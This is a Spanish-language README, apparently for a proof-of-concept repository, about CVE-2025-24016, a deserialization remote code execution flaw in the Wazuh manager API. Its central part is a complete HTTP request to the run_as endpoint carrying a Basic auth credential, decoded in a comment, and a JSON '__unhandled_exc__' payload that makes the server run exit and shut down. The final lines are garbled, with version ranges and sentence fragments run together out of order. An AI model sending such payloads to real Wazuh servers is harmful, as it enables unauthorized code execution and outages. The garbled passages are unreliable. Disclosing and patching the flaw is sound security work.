
CVE-2025-24016: RCE en servidor Wazuh! Ejecución remota de código
Este repositorio demuestra la vulnerabilidad de ejecución remota de código (RCE) en el servidor Wazuh, introducida por una deserialización insegura en el paquete wazuh-manager. La vulnerabilidad permite que atacantes remotos con acceso a la API (dashboard comprometido, servidores Wazuh en el clúster, o ciertas configuraciones con agentes comprometidos) ejecuten código arbitrario en el servidor.
wazuh-manager versión >= 4.4.0>= 4.9.1La vulnerabilidad ocurre en la API de Wazuh, donde los parámetros en DistributedAPI se serializan como JSON y se deserializan usando as_wazuh_object en el archivo framework/wazuh/core/cluster/common.py. Un atacante puede explotar esta vulnerabilidad inyectando un diccionario no saneado en las solicitudes DAPI, lo que puede llevar a la evaluación de código Python arbitrario.
La RCE puede ser desencadenada usando el endpoint run_as, que permite al atacante controlar el argumento auth_context. Al elaborar una solicitud maliciosa, se puede ejecutar código arbitrario en el servidor maestro.
Para desencadenar esta vulnerabilidad usando la API del servidor, siga los pasos a continuación.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__ que desencadena la ejecución de código Python arbitrario (exit en este caso).>= 4.4.0 hasta 4.9.0 (aún no parcheadas).exit, causando que el servidor Wazuh se apague.Para proteger sus sistemas, actualice a la versión >= 4.9.1 de Wazuh, donde este problema está parcheado.